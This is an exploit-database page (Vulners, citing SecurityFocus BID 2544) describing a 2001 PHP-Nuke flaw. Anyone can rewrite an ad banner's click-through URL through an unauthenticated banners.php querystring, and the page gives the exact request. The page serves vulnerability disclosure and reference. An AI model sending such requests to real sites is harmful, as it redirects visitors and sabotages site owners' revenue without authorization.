Vulners
Lucene search
PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change
source: https://www.securityfocus.com/bid/2544/info
PHP-Nuke is a website creation/maintainence tool written in PHP3.
A PHP-Nuke feature supporting cycling ad banners is subject to interference from a remote user.
A querystring can be submitted to an unpatched server which allows the remote user to specify a new destination URL to be opened in a visitor's browser upon clicking a PHP-nuke site's ad banner.
By changing the click-through destination of a banner ad, an attacker could interfere with the target's ad-based revenue generation.
To change the url of the first banner you should enter in your browser
http://target/banners.php?op=Change&bid=bannerid&url=http://where.to
if we want to change the banner number 1 to redir to
www.you_are_redir
we write
http://www.example.com/banners.php?op=Change&bid=1&url=http://you.are.redir
(where www.example.com is the server running php-nuke) Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Apr 2001 00:00Current
7.4High risk
Vulners AI Score7.4